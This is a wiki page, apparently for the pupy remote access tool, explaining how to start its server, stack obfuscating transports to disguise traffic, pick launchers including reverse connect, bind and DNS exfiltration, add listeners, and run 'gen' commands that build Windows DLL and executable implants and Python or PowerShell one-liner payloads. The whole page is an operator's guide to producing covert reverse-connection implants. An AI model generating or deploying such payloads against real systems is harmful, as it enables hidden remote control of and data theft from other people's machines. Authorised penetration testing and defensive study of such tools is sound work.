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AlessandroZ edited this page Oct 10, 2018 · 1 revision

Run the server

Once you have correctly installed pupy, you are ready to launch the server.


To generate working payloads, you should have a complete comprehension of how things work. transports, launchers, listeners and payloads terms have to be understood before starting.


All transports in pupy are stackable. This mean that by creating a custom transport conf (pupy/network/transport/<transport_name>/, you can make you pupy session looks like anything. For example you could stack HTTP over HTTP over base64 over HTTP over AES over obfs3 :o)

  • ssl (the default one): TCP transport wrapped with SSL.
  • rsa: Authentication & encryption using RSA and AES256, often stacked with other layers.
  • ssl_rsa: Same as ssl but stacked with a rsa layer.
  • websocket: Take a look of this article.
  • aes: Use of a static AES256 key.
  • http: Making the traffic looking like basic HTTP + stacked with a rsa layer.
  • obfs3: A protocol to keep a third party from telling what protocol is in use based on message contents. Obfs3 is stacked with a rsa layer for a better security
  • scramblesuit: A Polymorphic Network Protocol to Circumvent Censorship. Scramblesuit is stacked with a rsa layer for a better security.
  • udp: Rsa layer but over UDP (could be buggy, it doesn't handle packet loss yet).
  • other: Layers without really interest and are given for code examples : (dummy, base64, XOR, ...).


Launchers allow pupy to run custom actions before starting the reverse connection

  • connect: Connect back to our server.
  • bind: Bind payload instead of reverse
  • auto_proxy: Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retrieval methods are: registry, WPAD requests, gnome settings, HTTP_PROXY env variable
  • dnscnc: DNS exfiltration


By default, it tries to listen on port 443 using the ssl transport. This configuration can be changed on the pupy.conf file. To add listeners on pupysh, use listen as following:

>> listen -a <transport> <port>
  • Exemple:
>> listen -a ssl 8443
[+] Listen: ssl: 8443

Payloads format

Payloads format represent the way to build our payload. Some are implemented and you should use one depending on the context and system you are targeting:

  • client: executable to run on the target (.exe, .dll, .lin, .so).
  • py: python file.
  • pyinst: python file ready to be used with pyinstaller.
  • py_oneliner: python oneliner (start a listening server on background)
  • ps1: powershell file.
  • ps1_oneliner: powershell oneliner (start a listening server on background).
  • rubber_ducky: useful with rubber ducky.

Payloads Generation

Oneliners: For one shot usage use gen command inside pupysh. Once you get the session back, kill the server using CTRL-C. If you want to let the server running non stop, use using exactly the same syntax as explained below.

Payloads generation are done using the gen command.

>> gen -f <format> <launcher> -t <transport>

Here are some examples:

  • Windows dll
>> gen -S -f client -O windows -A x64 connect --host ip:port -t transport
  • Windows executable
>> gen -f client -O windows -A x64 connect --host ip:port -t transport
  • Python file - Bind
>> gen -f py bind --port port -t transport
  • Python oneliner
>> gen -f py_oneliner connect --host ip:port -t transport